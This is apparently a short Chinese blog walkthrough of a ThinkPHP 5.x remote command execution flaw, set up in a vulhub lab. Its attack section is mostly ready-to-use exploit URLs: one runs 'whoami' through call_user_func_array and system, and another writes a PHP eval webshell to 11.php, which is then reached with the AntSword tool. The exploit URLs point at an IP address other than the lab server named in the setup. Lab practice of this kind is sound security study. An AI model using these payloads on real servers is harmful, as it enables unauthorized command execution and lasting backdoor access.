Thinkphp(TP)框架漏洞攻略

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo%20%22%3C?php%20@eval(\$_POSTcmd);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
芝麻馅汤圆儿20 分钟前
跨三层环境(交换机vlan/vlanif配置)
网络
wjql235 分钟前
手机远程操控另一台手机的方法 手机可以远程操控手机吗
网络
一拳一个娘娘腔1 小时前
【后渗透-Linux篇】Linux 提权与逃逸:从 www-data到 root的蜕变
linux·运维·服务器
悲凉的紫菜1 小时前
dariy
android·ide·android studio
奶油话梅糖1 小时前
锐捷常用命令速查表
java·网络·windows
Dlrb12111 小时前
信息查询Web服务器-->电子商城信息查询项目
linux·服务器·数据库·html·嵌入式·epoll·数据查询
rcms152702692181 小时前
AMAT 0190-32401 通讯模块
网络
范纹杉想快点毕业1 小时前
嵌入式串口通信协议设计与解析完全教程
网络
2501_915909061 小时前
IPA 深度混淆是什么意思?从混淆强度到实际效果的解读
android·ios·小程序·https·uni-app·iphone·webview
chh5632 小时前
C++--string
java·开发语言·网络·c++·学习